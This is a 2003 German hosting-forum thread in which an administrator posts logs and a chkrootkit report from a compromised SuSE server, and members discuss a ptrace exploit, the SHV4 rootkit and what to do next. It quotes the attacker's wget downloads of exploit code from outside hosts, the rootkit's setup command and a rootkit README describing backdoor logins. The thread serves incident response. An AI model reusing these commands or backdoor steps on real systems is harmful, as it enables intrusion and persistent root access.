Showtee Rootkit Hacker Angriff

Lesenswerte Artikel, Anleitungen und Diskussionen
webhilfe
Posts: 67
Joined: 2002-05-03 14:20
Location: Hamburg

Showtee Rootkit Hacker Angriff

Post by webhilfe » 2003-08-04 22:12

Hallo :-)

Diese Einträge habe ich in den Apache logs gefunden:

Code: Select all

[Mon Aug  4 17:12:54 2003] [error] System: Invalid argument (errno: 22)
--17:21:59--  http://members.xoom.it/merlotx/back.c
           => `/tmp/.tmp/backwget.c'
Connecting to members.xoom.it:80... connected!
HTTP request sent, awaiting response... 302 Found
Location: http://members.xoom.virgilio.it/merlotx/back.c [following]
--17:21:59--  http://members.xoom.virgilio.it/merlotx/back.c
           => `/tmp/.tmp/backwget.c'
Connecting to members.xoom.virgilio.it:80... connected!
HTTP request sent, awaiting response... 200 OK
Length: 1,282 [text/plain]

    0K -> .                                                      [100%]

17:21:59 (1.22 MB/s) - `/tmp/.tmp/backwget.c' saved [1282/1282]

--17:21:59--  http://members.xoom.it/merlotx/back20.c
           => `/tmp/.tmp/back30.c'
Connecting to members.xoom.it:80... connected!
HTTP request sent, awaiting response... 302 Found
Location: http://members.xoom.virgilio.it/merlotx/back20.c [following]
--17:21:59--  http://members.xoom.virgilio.it/merlotx/back20.c
           => `/tmp/.tmp/back30.c'
Connecting to members.xoom.virgilio.it:80... connected!
HTTP request sent, awaiting response... 200 OK
Length: 1,335 [text/plain]

    0K -> .                                                      [100%]

17:21:59 (1.27 MB/s) - `/tmp/.tmp/back30.c' saved [1335/1335]

--17:21:59--  http://members.xoom.it/merlotx/tty
           => `/tmp/.tmp/ttywget'
Connecting to members.xoom.it:80... connected!
HTTP request sent, awaiting response... 302 Found
Location: http://members.xoom.virgilio.it/merlotx/tty [following]
--17:21:59--  http://members.xoom.virgilio.it/merlotx/tty
           => `/tmp/.tmp/ttywget'
Connecting to members.xoom.virgilio.it:80... connected!
HTTP request sent, awaiting response... 200 OK
Length: 19,472 [text/plain]

    0K -> .......... .........                                   [100%]

17:22:04 (16.68 KB/s) - `/tmp/.tmp/ttywget' saved [19472/19472]

--17:22:04--  http://packetstormsecurity.nl/0304-exploits/myptrace.c
           => `/tmp/.tmp/myptrace.c'
Connecting to packetstormsecurity.nl:80... connected!
HTTP request sent, awaiting response... 200 OK
Length: 6,296 [text/plain]

    0K -> ......                                                 [100%]

17:22:04 (323.60 KB/s) - `/tmp/.tmp/myptrace.c' saved [6296/6296]

--17:22:04--  http://members.xoom.it/merlotx/trace
           => `/tmp/.tmp/trace'
Connecting to members.xoom.it:80... connected!
HTTP request sent, awaiting response... 302 Found
Location: http://members.xoom.virgilio.it/merlotx/trace [following]
--17:22:04--  http://members.xoom.virgilio.it/merlotx/trace
           => `/tmp/.tmp/trace'
Connecting to members.xoom.virgilio.it:80... connected!
HTTP request sent, awaiting response... 200 OK
Length: 19,783 [text/plain]

    0K -> .......... .........                                   [100%]

17:22:05 (95.64 KB/s) - `/tmp/.tmp/trace' saved [19783/19783]

-> Parent's PID is 27174. Child's PID is 27175.
-> Attaching to 27176...
-> Got the thread!!
-> Something wrong and it timeout.
[+] Attached to 27180
[+] Waiting for signal
[+] Signal caught
[+] Shellcode placed at 0x400116cd
[+] Now wait for suid shell...
[-] Unable to attach: Operation not permitted
Kann mir jemand erklären was da abgeht?

Habe gestern den Server in den Auslieferungszustand zurückversetzen lassen.

Das Chrootkit hatte etwas gefunden:
Checking `ifconfig'... INFECTED
Searching for Showtee... Warning: Possible Showtee Rootkit installed

Scheinbar geht das selbe Spiel heute wieder von vorne los.

Wo kann ich mehr Infos finden?

Wäre für jede Hilfe dankbar!

dodolin
RSAC
Posts: 4009
Joined: 2003-01-21 01:59
Location: Sinsheim/Karlsruhe

Re: Showtee Rootkit Hacker Angriff

Post by dodolin » 2003-08-04 22:37

Kann mir jemand erklären was da abgeht?
Dein Rechner ist kompromitiert. (Wenn du willst, Logs sichern.) Neu aufsetzen lassen. Sofort alle Dienste (auch Apache!) bis auf SSH abschalten. Alle Security-Updates einspielen.

dea
RSAC
Posts: 619
Joined: 2002-08-13 12:05

Re: Showtee Rootkit Hacker Angriff

Post by dea » 2003-08-04 23:29

Hehe - wie war das?

Ruhe bewahren !!!

Zunächst den rootie (gehe mal davon aus, dass es einer ist) in den Rescue-Modus versetzen. Wenn es kein rootie ist hast Du ein Problem es sei denn, Du hast auch sowas ähnliches (in eine RAMDisk booten) vorbereitet. Damit verschaffst Du Dir zunächst etwas Luft.

Dann alle (!) Logs, Histories u. dgl sichern (ggf. wenn auch unwahrscheinlich juristisch relevant) und vor allem sorgfältig analysieren. Falls Du Kunden hast, diese lieber warten lassen oder auf einen anderen Server umziehen (Datenstand vor der eventuellen Kompromittierung!) als sich bei der Analyse unter Druck setzen lassen.

Auf den ersten Blick muss ich dodlin leider recht geben, allerdings bin ich mir nicht sicher, ob der Exploit geglückt ist ("Unable to attach: Operation not permitted").

Schau sicherheitshalber mal auf securityfocus.com, cert.org usw. nach und mach' Dich schlau, wie man einen Exploit erkennt und wie danach am geschicktesten zu Handeln ist.

webhilfe
Posts: 67
Joined: 2002-05-03 14:20
Location: Hamburg

Re: Showtee Rootkit Hacker Angriff

Post by webhilfe » 2003-08-05 00:26

dodolin wrote:
webhilfe wrote: meinst Du wirklich das es schon zu spät ist?
Ja.
Ich hab das doch gestern abend erst alles neu installiert.
Ein Exploit arbeitet vollautomatisch, d.h. der Cracker drückt aufs Köpfchen und Sekunden später ist dein Rechner gehackt, wenn er verwundbar war.
Mach auch wenig sinn, wenn ich nicht weiss wie der Hacker ins System kommt.
So wie ich das sehe, über Apache, wenn das im Apachen-Log auftaucht.
Hab nochmals mit chrootkit das system getestet und diesmal ist es nicht infiziert. Hab auch die betreffenden IP mit IPTABLES gespeert.
Ob das viel hilft? Dann kommt er halt nächstes Mal von einer anderen IP oder es kommt der nächste Hacker...
Das System ist ne SuSE 7.2, weil ich Suse 8.2 nicht so mag :-)

Wäre es vielleicht besser gleich auf die 8.2 upzudaten.
Wenn man alle Security-Updates einspielt, sollte das wurscht sein. Ich weiß aber nicht, ob SuSE überhaupt noch Security-Fixes für 7.2 rausbringt oder gar wie lange sie das noch machen werden...
Beim 2.4 Kernel soll es Probleme geben, vielleicht ist das ja mein Problem...
Möglich?! Du solltest unbedingt den allerneuesten (stabilen) Kernel einspielen!
Hast Du noch Ideen???
siehe oben.

PS: Wenn wir das öffentlich im Forum machen, haben vielleicht noch mehr Leute was von dieser Diskussion. :)

Hmmm, Der Support Mitarbeiter hatte auch schon seine bedenken angemeldet bezüglich der SuSE 7.2.

Dann werde ich morgen ein neues Fax an 1&1 schicken. Mach ich das ganze halt nochmal mit ner 8.2.

Allerdings kann ich mir nicht vorstellen das der Rechner erneut mit der gleichen Methode gehackt wird. Es waren auch die aktuellsten Patches installiert.

Chrootkit meldet diesmal allerdings keine infekte.

Ich habe im /tmp Verzeichniss ein weiteres .tmp Verzeichniss gefunden.
Den inhalt habe ich dort gelöscht und das Verz. schreibgeschützt.

Diese befehle hat der Angreifer gestern verwendet:

id
wget http://www.zlotow.net/~shcrew/web/files/sh/shv4.tgz
tar -xzvf shv4.tgz
cd shv4
./setup fregna 88990
killall -9 backwget
killall -9 ttylynx
killall -9 ttymon
killall -9 ttywget

Code: Select all

ROOTDIR is `/'
Checking `amd'... not found
Checking `basename'... not infected
Checking `biff'... not found
Checking `chfn'... not infected
Checking `chsh'... not infected
Checking `cron'... not infected
Checking `date'... not infected
Checking `du'... not infected
Checking `dirname'... not infected
Checking `echo'... not infected
Checking `egrep'... not infected
Checking `env'... not infected
Checking `find'... not infected
Checking `fingerd'... not found
Checking `gpm'... not infected
Checking `grep'... not infected
Checking `hdparm'... not infected
Checking `su'... not infected
Checking `ifconfig'... INFECTED
Checking `inetd'... not infected
Checking `inetdconf'... not infected
Checking `identd'... not found
Checking `init'... not infected
Checking `killall'... not infected
Checking `ldsopreload'... can't exec ./strings-static, not tested Checking `login'... INFECTED Checking `ls'... not infected Checking `lsof'... not infected Checking `mail'... not infected Checking `mingetty'... not infected Checking `netstat'... not infected Checking `named'... not infected Checking `passwd'... not infected Checking `pidof'... not infected Checking `pop2'... not found Checking `pop3'... not found Checking `ps'... not infected Checking `pstree'... INFECTED Checking `rpcinfo'... not infected Checking `rlogind'... not found Checking `rshd'... not found Checking `slogin'... not infected Checking `sendmail'... not infected Checking `sshd'... not infected Checking `syslogd'... not infected Checking `tar'... not infected Checking `tcpd'... not infected Checking `tcpdump'... not infected Checking `top'... not infected Checking `telnetd'... not found Checking `timed'... not found Checking `traceroute'... not infected Checking `w'... not infected Checking `write'... not infected Checking `aliens'... /etc/ld.so.hash Searching for sniffer's logs, it may take a while... nothing found Searching for HiDrootkit's default dir... nothing found Searching for t0rn's default files and dirs... nothing found Searching for t0rn's v8 defaults... Possible t0rn v8 (or variation) rootkit installed Searching for Lion Worm default files and dirs... nothing found Searching for RSHA's default files and dir... nothing found Searching for RH-Sharpe's default files... nothing found Searching for Ambient's rootkit (ark) default files and dirs... nothing found Searching for suspicious files and dirs, it may take a while... 
/usr/lib/perl5/5.6.0/i586-linux/.packlist
/usr/lib/perl5/5.6.0/i586-linux/auto/File/Spec/.packlist
/usr/lib/perl5/5.6.0/i586-linux/auto/GD/.packlist
/usr/lib/perl5/5.6.0/i586-linux/auto/Mcrypt/.packlist
/usr/lib/perl5/5.6.0/i586-linux/auto/Time/HiRes/.packlist
/usr/lib/perl5/5.6.0/i586-linux/auto/CGI/.packlist
/usr/lib/perl5/site_perl/5.6.0/i586-linux/auto/Alien/.packlist
/usr/lib/perl5/site_perl/5.6.0/i586-linux/auto/Apache/ASP/.packlist
/usr/lib/perl5/site_perl/5.6.0/i586-linux/auto/Apache/AuthNetLDAP/.packlist
/usr/lib/perl5/site_perl/5.6.0/i586-linux/auto/Apache/AuthzNetLDAP/.packlist
/usr/lib/perl5/site_perl/5.6.0/i586-linux/auto/Apache/AutoIndex/.packlist
/usr/lib/perl5/site_perl/5.6.0/i586-linux/auto/Apache/Filter/.packlist
/usr/lib/perl5/site_perl/5.6.0/i586-linux/auto/Apache/Icon/.packlist
/usr/lib/perl5/site_perl/5.6.0/i586-linux/auto/Apache/Language/.packlist
/usr/lib/perl5/site_perl/5.6.0/i586-linux/auto/Apache/SSI/.packlist
/usr/lib/perl5/site_perl/5.6.0/i586-linux/auto/Apache/Sandwich/.packlist
/usr/lib/perl5/site_perl/5.6.0/i586-linux/auto/Apache/Session/.packlist
/usr/lib/perl5/site_perl/5.6.0/i586-linux/auto/Apache/DBI/.packlist
/usr/lib/perl5/site_perl/5.6.0/i586-linux/auto/w3mir/.packlist
/usr/lib/perl5/site_perl/5.6.0/i586-linux/auto/Weblint/.packlist
/usr/lib/perl5/site_perl/5.6.0/i586-linux/auto/Storable/.packlist
/usr/lib/perl5/site_perl/5.6.0/i586-linux/auto/Tk/.packlist
/usr/lib/perl5/site_perl/5.6.0/i586-linux/auto/Locale/gettext/.packlist
/usr/lib/perl5/site_perl/5.6.0/i586-linux/auto/Compress/Zlib/.packlist
/usr/lib/perl5/site_perl/5.6.0/i586-linux/auto/Config/General/.packlist
/usr/lib/perl5/site_perl/5.6.0/i586-linux/auto/Config/IniFiles/.packlist
/usr/lib/perl5/site_perl/5.6.0/i586-linux/auto/Curses/.packlist
/usr/lib/perl5/site_perl/5.6.0/i586-linux/auto/Cyrus/IMAP/.packlist
/usr/lib/perl5/site_perl/5.6.0/i586-linux/auto/DBI/.packlist
/usr/lib/perl5/site_perl/5.6.0/i586-linux/auto/Data/ShowTable/.packlist
/usr/lib/perl5/site_perl/5.6.0/i586-linux/auto/Date/Calc/.packlist
/usr/lib/perl5/site_perl/5.6.0/i586-linux/auto/Date/Manip/.packlist
/usr/lib/perl5/site_perl/5.6.0/i586-linux/auto/Digest/MD5/.packlist
/usr/lib/perl5/site_perl/5.6.0/i586-linux/auto/HTML/Parser/.packlist
/usr/lib/perl5/site_perl/5.6.0/i586-linux/auto/HTML/SimpleParse/.packlist
/usr/lib/perl5/site_perl/5.6.0/i586-linux/auto/HTML/Clean/.packlist
/usr/lib/perl5/site_perl/5.6.0/i586-linux/auto/HTML/FillInForm/.packlist
/usr/lib/perl5/site_perl/5.6.0/i586-linux/auto/IO/Socket/SSL/.packlist
/usr/lib/perl5/site_perl/5.6.0/i586-linux/auto/IO-stringy/.packlist
/usr/lib/perl5/site_perl/5.6.0/i586-linux/auto/MIME/Base64/.packlist
/usr/lib/perl5/site_perl/5.6.0/i586-linux/auto/MIME/Lite/.packlist
/usr/lib/perl5/site_perl/5.6.0/i586-linux/auto/MIME-tools/.packlist
/usr/lib/perl5/site_perl/5.6.0/i586-linux/auto/MLDBM/.packlist
/usr/lib/perl5/site_perl/5.6.0/i586-linux/auto/Mail/.packlist
/usr/lib/perl5/site_perl/5.6.0/i586-linux/auto/Mail/Sender/.packlist
/usr/lib/perl5/site_perl/5.6.0/i586-linux/auto/Mail/POP3Client/.packlist
/usr/lib/perl5/site_perl/5.6.0/i586-linux/auto/Mail/SpamAssassin/.packlist
/usr/lib/perl5/site_perl/5.6.0/i586-linux/auto/Mail/Sendmail/.packlist
/usr/lib/perl5/site_perl/5.6.0/i586-linux/auto/DBD/CSV/.packlist
/usr/lib/perl5/site_perl/5.6.0/i586-linux/auto/Msql-Mysql-modules/.packlist
/usr/lib/perl5/site_perl/5.6.0/i586-linux/auto/Net/DNS/.packlist
/usr/lib/perl5/site_perl/5.6.0/i586-linux/auto/Net/Daemon/.packlist
/usr/lib/perl5/site_perl/5.6.0/i586-linux/auto/Net/Netmask/.packlist
/usr/lib/perl5/site_perl/5.6.0/i586-linux/auto/Net/SNMP/.packlist
/usr/lib/perl5/site_perl/5.6.0/i586-linux/auto/Net/SSLeay/.packlist
/usr/lib/perl5/site_perl/5.6.0/i586-linux/auto/Net/.packlist
/usr/lib/perl5/site_perl/5.6.0/i586-linux/auto/Net/XWhois/.packlist
/usr/lib/perl5/site_perl/5.6.0/i586-linux/auto/Net/IPv4Addr/.packlist
/usr/lib/perl5/site_perl/5.6.0/i586-linux/auto/Image/Magick/.packlist
/usr/lib/perl5/site_perl/5.6.0/i586-linux/auto/SQL/Statement/.packlist
/usr/lib/perl5/site_perl/5.6.0/i586-linux/auto/Tie/IxHash/.packlist
/usr/lib/perl5/site_perl/5.6.0/i586-linux/auto/TimeDate/.packlist
/usr/lib/perl5/site_perl/5.6.0/i586-linux/auto/URI/.packlist
/usr/lib/perl5/site_perl/5.6.0/i586-linux/auto/libwww-perl/.packlist
/usr/lib/perl5/site_perl/5.6.0/i586-linux/auto/Quota/.packlist
/usr/lib/perl5/site_perl/5.6.0/i586-linux/auto/Logfile/Rotate/.packlist
/usr/lib/perl5/site_perl/5.6.0/i586-linux/auto/Proc/ProcessTable/.packlist
/usr/lib/perl5/site_perl/5.6.0/i586-linux/auto/Term/ReadKey/.packlist
/usr/lib/perl5/site_perl/5.6.0/i586-linux/auto/RRDp/.packlist
/usr/lib/perl5/site_perl/5.6.0/i586-linux/auto/RRDs/.packlist
/usr/lib/perl5/site_perl/5.6.0/i586-linux/auto/GD/Text/.packlist
/usr/lib/perl5/site_perl/5.6.0/i586-linux/auto/GD/Graph/.packlist
/usr/lib/perl5/site_perl/5.6.0/i586-linux/auto/Class/Date/.packlist
/usr/lib/perl5/site_perl/5.6.0/i586-linux/auto/MD5/.packlist
/usr/lib/perl5/site_perl/5.6.0/i586-linux/auto/Crypt/RC4/.packlist
/usr/lib/perl5/site_perl/5.6.0/i586-linux/auto/Filesys/Statvfs/.packlist
/usr/lib/perl5/site_perl/5.6.0/i586-linux/auto/Archive/Zip/.packlist
/usr/lib/perl5/site_perl/5.6.0/i586-linux/auto/Archive/Tar/.packlist
/usr/lib/perl5/site_perl/5.6.0/i586-linux/auto/Convert/ASN1/.packlist
/usr/lib/perl5/site_perl/5.6.0/i586-linux/auto/Convert/BER/.packlist
/usr/lib/perl5/site_perl/5.6.0/i586-linux/auto/Convert/TNEF/.packlist
/usr/lib/perl5/site_perl/5.6.0/i586-linux/auto/Convert/UUlib/.packlist
/usr/lib/perl5/site_perl/5.6.0/i586-linux/auto/Devel/Symdump/.packlist
/usr/lib/perl5/site_perl/5.6.0/i586-linux/auto/I18N/LangTags/.packlist
/usr/lib/perl5/site_perl/5.6.0/i586-linux/auto/SNMP/.packlist
/usr/lib/perl5/site_perl/5.6.0/i586-linux/auto/Unix/Syslog/.packlist
/usr/lib/perl5/site_perl/5.6.0/i586-linux/auto/XML/DOM/.packlist
/usr/lib/perl5/site_perl/5.6.0/i586-linux/auto/XML/Parser/.packlist
/usr/lib/perl5/site_perl/5.6.0/i586-linux/auto/XML/XSLT/.packlist
/usr/lib/perl5/site_perl/5.6.0/i586-linux/auto/perl-ldap/.packlist
/usr/lib/perl5/site_perl/5.6.0/i586-linux/auto/Qt/.packlist
/usr/lib/perl5/site_perl/5.6.0/i586-linux/auto/IPTables/Parse/.packlist
/usr/lib/perl5/site_perl/5.6.0/i586-linux/auto/File/MMagic/.packlist
/usr/lib/perl5/site_perl/5.6.0/i586-linux/auto/Text/CSV_XS/.packlist
/usr/lib/perl5/site_perl/5.6.0/i586-linux/auto/Text/Iconv/.packlist
/usr/lib/jdk1.1.8/bin/.java_wrapper
/usr/lib/jdk1.1.8/bin/i686/green_threads/.extract_args
/usr/lib/jdk1.1.8/bin/i686/native_threads/.extract_args
/usr/lib/jre1.1.7/bin/.java_wrapper
/usr/lib/jre1.1.7/bin/i686/green_threads/.extract_args
/usr/lib/jre1.1.7/bin/i686/native_threads/.extract_args
/usr/lib/psad/i586-linux/auto/Psad/.packlist

Searching for LPD Worm files and dirs... nothing found Searching for Ramen Worm files and dirs... nothing found Searching for Maniac files and dirs... nothing found Searching for RK17 files and dirs... nothing found Searching for Ducoci rootkit... nothing found Searching for Adore Worm... nothing found Searching for ShitC Worm... nothing found Searching for Omega Worm... nothing found Searching for Sadmind/IIS Worm... nothing found Searching for MonKit... nothing found Searching for Showtee... Warning: Possible Showtee Rootkit installed Searching for OpticKit... nothing found Searching for T.R.K... nothing found Searching for Mithra... nothing found Searching for OBSD rk v1... nothing found Searching for LOC rootkit ... nothing found Searching for Romanian rootkit ...  /usr/include/file.h /usr/include/proc.h Searching for anomalies in shell history files... nothing found Checking `asp'... not infected Checking `bindshell'... not infected Checking `lkm'... Checking `rexedcs'... not found Checking `sniffer'... not tested: can't exec ./ifpromisc Checking `wted'... not tested: can't exec ./chkwtmp Checking `scalper'... not infected Checking `slapper'... not infected Checking `z2'... not tested: can't exec ./chklastlog

dodolin
RSAC
Posts: 4009
Joined: 2003-01-21 01:59
Location: Sinsheim/Karlsruhe

Re: Showtee Rootkit Hacker Angriff

Post by dodolin » 2003-08-05 01:00

Ok, habe mir die Logs jetzt nochmal genauer angeschaut:
17:22:05 (95.64 KB/s) - `/tmp/.tmp/trace' saved [19783/19783]

-> Parent's PID is 27174. Child's PID is 27175.
-> Attaching to 27176...
-> Got the thread!!
-> Something wrong and it timeout.
[+] Attached to 27180
[+] Waiting for signal
[+] Signal caught
[+] Shellcode placed at 0x400116cd
[+] Now wait for suid shell...
[-] Unable to attach: Operation not permitted
Klingt sehr nach einen ptrace-Exploit. Dagegen hilft nur, einen aktuellen Kernel zu verwenden. Wenn du das nicht machst...

allerdings bin ich mir nicht sicher, ob der Exploit geglückt ist ("Unable to attach: Operation not permitted").
Für mich sieht obiges so aus, als probiert der Exploit der Reihe nach alle Apachen-Kinder durch. Wenn es bei einem nicht hinhaut, ist ja kein Problem, nimmt er das nächste...
Diese befehle hat der Angreifer gestern verwendet:

id
wget http://www.zlotow.net/~shcrew/web/files/sh/shv4.tgz
tar -xzvf shv4.tgz
cd shv4
./setup fregna 88990
killall -9 backwget
killall -9 ttylynx
killall -9 ttymon
killall -9 ttywget
Das sieht nicht wirklich gut aus. Ich vermute, dass mit

./setup fregna 88990

eine Backdoor gestartet wurde. Danach konnte er die anderen Prozesse von sich abschießen. Eventuell mal von Außen den Rechner mit nmap scannen. Aber vorsicht: Das muss nichts heißen, es gibt Backdoors, die sind mit keinem "normalen" Scanner zu erkennen, da sie keine offenen Ports hinterlassen und die Ports nur beim Empfang bestimmter "Magic Packets" öffnen.

Ebenso hat es nichts zu heißen, wenn chrootkit nichts findet, weil, wenn ein Rechner erst mal gerootet ist, dann kann der Cracker so ziemlich alles machen und jegliche Aussagen von lokal gestarteten Programmen sind nicht mehr vertrauenswürdig.

User avatar
Joe User
Project Manager
Project Manager
Posts: 11578
Joined: 2003-02-27 01:00
Location: Hamburg

Re: Showtee Rootkit Hacker Angriff

Post by Joe User » 2003-08-05 02:00

Moin,
dodolin wrote:Ebenso hat es nichts zu heißen, wenn chrootkit nichts findet, weil, wenn ein Rechner erst mal gerootet ist, dann kann der Cracker so ziemlich alles machen und jegliche Aussagen von lokal gestarteten Programmen sind nicht mehr vertrauenswürdig.
auch den Logfiles darf man nicht mehr vertrauen, ansonsten ACK.

Gruss,
Markus

dodolin
RSAC
Posts: 4009
Joined: 2003-01-21 01:59
Location: Sinsheim/Karlsruhe

Re: Showtee Rootkit Hacker Angriff

Post by dodolin » 2003-08-05 02:48

auch den Logfiles darf man nicht mehr vertrauen, ansonsten ACK.
Das ist natürlich korrekt. Hatte ich vergessen zu erwähnen, ja.

Allerdings: Wenn ich mir obige Apache-Logs so ansehe, ist wohl davon auszugehen, dass zumindest diese noch stimmen. Weil welcher Cracker wäre wohl so blöd und würde das drinstehen lassen, außer einem Scriptkid? Aber klar, sicher kann man sich da nie sein, ob die Logs noch stimmen...

dea
RSAC
Posts: 619
Joined: 2002-08-13 12:05

Re: Showtee Rootkit Hacker Angriff

Post by dea » 2003-08-05 08:54

Das ist imho ein SK mit einem "Out-Of-The-Box" Exploit. Er hat ja nicht nur die Apache-Logs sondern auch die .bash_history und wahrscheinlich auch weiteres nicht gesäubert.

FYI: Google brachte dann folgendes:
http://groups.yahoo.com/group/raq/message/33754?source=1 wrote:# shkit-v4-internal release 2002
# inspired from tk but fixed a lot of shits
# and added new ones to suite our needs.
# patched ./pg coz it was buggy on tkv8
# urgent release due to x2 SSHD vulnerability
# SSHD patched in this version so dont try
# ./x2 -t 1 victim port any more ;)
# hax0r w1th th1s as much as u want
# USAGE:
# ./setup pass port
#
# SSHD backdoor: ssh -l root -p port hostname
# when prompted for password enter your rootkit password
# login backdoor: DISPLAY=pass ; export DISPLAY ; telnet victim
# type anything at login, and type arf for pass and b00m r00t
Also anscheinend eher keiin ptrace Exploit, sondern ein ganz normales Rootkit :/

dodolin
RSAC
Posts: 4009
Joined: 2003-01-21 01:59
Location: Sinsheim/Karlsruhe

Re: Showtee Rootkit Hacker Angriff

Post by dodolin » 2003-08-05 09:22

Also anscheinend eher keiin ptrace Exploit, sondern ein ganz normales Rootkit :/
Meinst?

Auch um "ein ganz normales Rootkit" zu plazieren, muss man erst mal einen User hacken oder den Rechner gleich rooten. Das könnte gut mit dem ptrace-Bug gehen... Aber gut, so der Experte bin ich da jetzt auch nicht...

webhilfe
Posts: 67
Joined: 2002-05-03 14:20
Location: Hamburg

Re: Showtee Rootkit Hacker Angriff

Post by webhilfe » 2003-08-05 11:09

Moin Moin,

ersteimal vielen Dankf für die "Anteilnahme" :-)

Heute Nacht hat er wieder zugeschlagen oder es zumidest versucht.

Code: Select all

mkdir: cannot create directory `/tmp/.tmp': Die Datei existiert bereits
sh: /tmp/.tmp/ttylyn: Keine Berechtigung
sh: /tmp/.tmp/backlyn.c: Keine Berechtigung
sh: /tmp/.tmp/back20.c: Keine Berechtigung
sh: /tmp/.tmp/tracelyn: Keine Berechtigung
/tmp/.tmp/backwget.c: Keine Berechtigung
/tmp/.tmp/back30.c: Keine Berechtigung
/tmp/.tmp/ttywget: Keine Berechtigung
/tmp/.tmp/myptrace.c: Keine Berechtigung
/tmp/.tmp/trace: Keine Berechtigung
chmod: getting attributes of `/tmp/.tmp/ttylyn': Keine Berechtigung
chmod: getting attributes of `/tmp/.tmp/ttywget': Keine Berechtigung
chmod: getting attributes of `/tmp/.tmp/trace': Keine Berechtigung
chmod: getting attributes of `/tmp/.tmp/tracelyn': Keine Berechtigung
gcc: /tmp/.tmp/myptrace.c: Keine Berechtigung
gcc: No input files
gcc: /tmp/.tmp/backlyn.c: Keine Berechtigung
gcc: No input files
gcc: /tmp/.tmp/backwget.c: Keine Berechtigung
gcc: No input files
gcc: /tmp/.tmp/back20.c: Keine Berechtigung
gcc: No input files
gcc: /tmp/.tmp/back30.c: Keine Berechtigung
gcc: No input files
ls: /tmp/.tmp/: Keine Berechtigung
sh: cd: /tmp/.tmp/: Keine Berechtigung
sh: ./ptrace: Datei oder Verzeichnis nicht gefunden
sh: cd: /tmp/.tmp/: Keine Berechtigung
sh: ./trace: Datei oder Verzeichnis nicht gefunden
sh: cd: /tmp/.tmp/: Keine Berechtigung
sh: ./tracelyn: Datei oder Verzeichnis nicht gefunden
sh: cd: /tmp/.tmp/: Keine Berechtigung
sh: ./ttywget: Datei oder Verzeichnis nicht gefunden
sh: cd: /tmp/.tmp/: Keine Berechtigung
sh: ./ttylyn: Datei oder Verzeichnis nicht gefunden
sh: cd: /tmp/.tmp/: Keine Berechtigung
sh: ./backwget: Datei oder Verzeichnis nicht gefunden
sh: cd: /tmp/.tmp/: Keine Berechtigung
sh: ./back20: Datei oder Verzeichnis nicht gefunden
sh: cd: /tmp/.tmp/: Keine Berechtigung
sh: ./back30: Datei oder Verzeichnis nicht gefunden
sh: cd: /tmp/.tmp/: Keine Berechtigung
sh: ./backlyn: Datei oder Verzeichnis nicht gefunden
Ich war wohl zur richtigen Zeit am richtigen Ort, da ich das Verzeichniss ja entdeckt habe und den Zugriff gespeert habe.

Das Problem scheint der Kernel 2.4 zu sein. Da dieser sehr verbreitet ist, wird es in der nächsten Zeit wohl noch mehr Angriffe dieser Art geben.

@dodolin
Allerdings: Wenn ich mir obige Apache-Logs so ansehe, ist wohl davon auszugehen, dass zumindest diese noch stimmen. Weil welcher Cracker wäre wohl so blöd und würde das drinstehen lassen, außer einem Scriptkid? Aber klar, sicher kann man sich da nie sein, ob die Logs noch stimmen...
Hehe, die Logdateien liegen auf einem anderen Server, daher ist das löschen der Dateien auch nicht sinvoll :-)

Ich bin nun wirklich am überlegen ob ich mir die Arbeit mit Suse 8.2 wirklich machen soll. Vielleicht reicht ja schon ein Update auf einen neuen Kernel?!

Nunmal zur rechtlichen Frage.
Letzte Woche hat jemand versucht das root pw zu knacken. Danach ging das Problem richtig los. Der Angreifer versuchte dies über seinen Telekom Account, somit liegt mir die IP Adresse vor.

Ich habe das natürlich der Telekom gemeldet aber bis heute noch keine Antwort erhalten.

Muss ich jetzt zur Polizei und Strafanzeige gegen unbekannt stellen?

Outlaw
Posts: 1500
Joined: 2002-12-04 10:22
Location: 4. Server von rechts, 2. Reihe von oben

Re: Showtee Rootkit Hacker Angriff

Post by Outlaw » 2003-08-05 11:30

Würde ich auf jeden Fall machen. Zudem kostet so eine Anzeige nix. Das aht unter anderem auch den Vorteil, daß manche Provider nur aktiv werden oder entgegenkommen, wenn man ein Aktenzeichn vorlegt und viele dürfen wichtige Daten nur an die Behörden für Ermittlungszwecke herausgeben.

Die Geschichte kann auch richtig fett unangenehm werden, wenn Schaden bei anderen durch Deinen Server entstanden ist. Dann sollte neben den üblichen Massnahmen auch diese Anzeige am Laufen haben. Wenn diese auch nicht zum Erfolg führt, so hat man wenigstens alles versucht und muss sich hinterher nichts nachsagen lassen (ausser dem, was Du zu verantworten hast).

Gruß Outi
:D Gruß Outi :D

arty
Userprojekt
Userprojekt
Posts: 761
Joined: 2002-06-12 10:11

Re: Showtee Rootkit Hacker Angriff

Post by arty » 2003-08-05 11:38

Hi,

wegen einer Anzeige, mach das am besten online:

http://www.polizei.nrw.de/koeln/onlinea ... rwort.html

Dann sparst du dir die Erklärungen bei der örtlichen Polizei, die kapieren das wahrscheinlich eh nicht...

bye
arty

dodolin
RSAC
Posts: 4009
Joined: 2003-01-21 01:59
Location: Sinsheim/Karlsruhe

Re: Showtee Rootkit Hacker Angriff

Post by dodolin » 2003-08-05 12:22

Jeder ISP darf laut Datenschutzgesetzt Verbindungsdaten ausschließlich an ermittelnde Behörden rausgeben und das auch nur, wenn eine Anzeige vorliegt. Also: Mail an Telekom schreiben, dass du Strafanzeige gegen IP X stellen wirst und sie die nötigen Verbindungsdaten sichern sollen (sie bewahren das nur eine bestimmte Zeit lang auf). Danach Anzeige bei der Polente erstatten.

static
Posts: 437
Joined: 2002-10-27 19:56
Location: Schweiz

Re: Showtee Rootkit Hacker Angriff

Post by static » 2003-08-05 13:04

Hi,
ich kann dir zwar leider überhaupt nicht helfen - aber 2 Fragen hätt ich, weil ich's grad recht interessant finde :twisted:

1. Weisst du wie der Typ bei dir auf's System gekommen ist um die Dateien überhaupt herunterzuladen und auszuführen? Hast du lokale User drauf? Bzw. wie soll downloaden und ausführen über den Apache möglich sein?!?

2. Wie erstellst du so detaillierte Logs, dass jede Ausgabe usw. aufgezeichnet ist?

Und noch ne allgemeine Frage - bei diesen ptrace exploits, da braucht man doch schon lokalen Zugang zum System oder nicht?

so long
static

dea
RSAC
Posts: 619
Joined: 2002-08-13 12:05

Re: Showtee Rootkit Hacker Angriff

Post by dea » 2003-08-05 13:14

dodolin wrote:
Also anscheinend eher keiin ptrace Exploit, sondern ein ganz normales Rootkit :/
Meinst?

Auch um "ein ganz normales Rootkit" zu plazieren, muss man erst mal einen User hacken oder den Rechner gleich rooten. Das könnte gut mit dem ptrace-Bug gehen... Aber gut, so der Experte bin ich da jetzt auch nicht...
War der ptrace nicht ein local exploit? Ich kann mich jetzt nicht mehr genau erinnern ...

